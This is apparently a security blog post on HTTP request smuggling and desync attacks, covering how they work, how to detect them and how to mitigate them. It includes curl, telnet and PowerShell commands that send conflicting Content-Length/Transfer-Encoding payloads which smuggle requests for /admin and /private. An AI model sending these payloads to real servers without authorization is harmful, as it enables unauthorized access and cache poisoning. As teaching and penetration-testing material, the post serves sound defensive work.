Listen to this Post
HTTP Request Smuggling and HTTP Desync attacks exploit inconsistencies in how web servers process requests. These techniques are critical for penetration testers and security professionals.
HTTP Request Smuggling (HTTP/1.1 & HTTP/2)
- Exploits differences in how front-end (reverse proxy, CDN, load balancer) and back-end (API server, database, Node.js) servers interpret request boundaries.
- Manipulates `Content-Length` and `Transfer-Encoding` headers to inject hidden requests.
Key Traits
- Front-end sees `Content-Length: N` (decimal), while back-end reads `Transfer-Encoding: chunked` (hex).
- If successful, the back-end processes smuggled requests, leading to cache poisoning, credential theft, or unauthorized access.
HTTP Desync Attack
- Occurs when request parsing falls out of sync between components (WAF, proxy, app server).
- Causes request queue poisoning, response misdelivery, and boundary confusion.
Key Indicators
- 502 Bad Gateway errors suggest misrouted requests.
- Request smuggling can lead to desync if servers interpret headers differently.
You Should Know: Practical Exploitation & Defense
Testing for HTTP Request Smuggling
Using curl to test CL.TE (Content-Length vs Transfer-Encoding) curl -X POST http://target.com -H "Transfer-Encoding: chunked" -H "Content-Length: 6" -d "0\r\n\r\nGET /admin HTTP/1.1\r\nHost: target.com\r\n\r\n" Using Burp Suite to automate smuggling 1. Intercept a request in Burp. 2. Modify headers to include conflicting `Content-Length` and <code>Transfer-Encoding</code>. 3. Forward and observe server behavior.
Detecting Desync Vulnerabilities
Check for inconsistent parsing with telnet telnet target.com 80 POST / HTTP/1.1 Host: target.com Content-Length: 50 Transfer-Encoding: chunked 0 GET /private HTTP/1.1 Host: target.com
– If the server processes the smuggled request, itβs vulnerable.
Mitigation Techniques
- Normalize headers at the proxy level.
- Disable HTTP/1.0 support if possible.
- Patch web servers (Apache, Nginx, HAProxy) to prevent inconsistent parsing.
Expected Output
- A vulnerable server may:
- Return cached responses from another user.
- Process smuggled requests as legitimate.
- Leak internal API data.
What Undercode Say
HTTP desync and smuggling remain critical attack vectors due to inconsistent server implementations. Security teams must:
– Monitor for 502 errors (indicator of desync).
– Test with automated tools (Burp, OWASP ZAP).
– Enforce strict header validation in load balancers.
Essential Linux & Windows Commands
Linux: Check open ports (useful for finding proxies)
netstat -tuln | grep 80
Windows: Test HTTP smuggling with PowerShell
Invoke-WebRequest -Uri "http://target.com" -Method POST -Headers @{"Content-Length"="6"; "Transfer-Encoding"="chunked"} -Body "0<code>r</code>n<code>r</code>nGET /admin HTTP/1.1<code>r</code>nHost: target.com<code>r</code>n<code>r</code>n"
Nginx mitigation (force HTTP/1.1 normalization)
proxy_http_version 1.1;
proxy_set_header Connection "";
Prediction
As HTTP/2 adoption grows, new variants of smuggling attacks will emerge, requiring deeper protocol-level analysis. AI-powered fuzz testing may become essential for detecting desync flaws.
References
- PortSwigger: HTTP Request Smuggling
- HTTP/2: The Sequel is Always Worse
- Browser-Powered Desync Attacks
- HTTP Desync Attacks: Request Smuggling Reborn
References:
Reported By: Activity 7328680113951109120 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass β
